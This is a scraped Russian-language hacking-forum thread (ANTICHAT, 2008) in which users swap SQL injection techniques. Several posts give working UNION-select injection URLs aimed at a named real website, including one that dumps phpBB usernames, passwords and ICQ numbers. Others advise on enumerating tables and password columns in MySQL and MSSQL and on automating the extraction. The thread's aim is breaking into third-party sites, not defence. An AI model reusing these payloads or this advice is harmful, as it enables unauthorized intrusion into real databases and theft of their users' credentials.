ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.05.2008, 12:02
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
точно там же concat)) блогадарю
|
|
|
10.05.2008, 12:37
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Сообщение от Sharingan
касательно сообщение #1921 так и не нашел сплойта, может кто что посоветует ?
Порутать данную тачку нечем. Паблик эксплойтов нет, приватных не видел
|
|
|
|
10.05.2008, 22:10
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+1,2/*
Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго
|
|
|
|
10.05.2008, 22:25
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от diznt
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+1,2/*
Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,concat(username,0x3a,user_passwor d,0x3a,user_icq),3,4,5,6,7,8,9+from+phpbb_users+li mit+1,1/*
юзеры форума. Если на сайте есть форум, значит можно попытать залезть а таблицу его юзеров. Для пхпбб эта таблица как правило имеет название phpbb_users.
А вобще используй запрос типа такого http://www.site.ru/index.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.columns+where+column_name='passwor d'/*
Ты получаешь все таблицы, где есть колумн password. Можно вместо ='password' использовать функцию char()
|
|
|
|
10.05.2008, 22:26
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
мде..
Сообщение от diznt
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+1,2/*
Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго
Напиши скрипт(например на пхп)который будит будит подставлять значения лимита за тебя и собирать результат в тхт (где-то видел такой,помоему на грабберз.ком )
ЗЫ:Первые 17 значений - системные таблы!
Последний раз редактировалось S00pY; 10.05.2008 в 22:28..
|
|
|
|
10.05.2008, 22:50
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2 diznt ...ves' kaif lomae6.... uznavat' tables i columns v udovol'stvie.ili ti postavil na promishlennii ma6tab vzlomi 4erez sql.Kud anarod katitsea  )) nikakoi romantiki uje...vse na avtomatiku prutsea..skoro v detskom sadike deti budut progoi ustanovlenoi v tetris serveri lomat' )) uda4i vam vsem v va6em nelegkom trude.... |
|
|
|
11.05.2008, 08:15
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
знаю что нет но всётаки решил спрсить.... в mssql иньекции никак не выдернуить данные из другой бд?
|
|
|
|
11.05.2008, 09:09
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
xcedz
откуда в mssql - load_file() взялся?
в mssql иньекции никак не выдернуить данные из другой бд?
Что ты подразумеваешь под другой БД?
select ColumnName from DBname.TableName ???
имена бд на сервере можно так посматреть:
Select schema_name from information_schema.schemata
если ты конечно про это...
Последний раз редактировалось aka PSIH; 11.05.2008 в 09:15..
|
|
|
|
11.05.2008, 09:14
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от aka PSIH
xcedz
откуда в mssql - load_file() взялся?
 блин не внимательно посмотрел.
==
а можно так:
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...
http://msdn.microsoft.com/en-us/library/bb545450.aspx
тогда для текущей базы:
----------------------------------------
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' --
h==p://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
Последний раз редактировалось xcedz; 11.05.2008 в 09:37..
|
|
|
|
11.05.2008, 15:28
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
Нет ... я знаю имена всех БД
например сейчас есть подключение с БД test1 а на сервре через
SELECT DB_NAME(N) я просмотрел все БД например test1,test2,test3
можно ли выташить данные из test2?
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
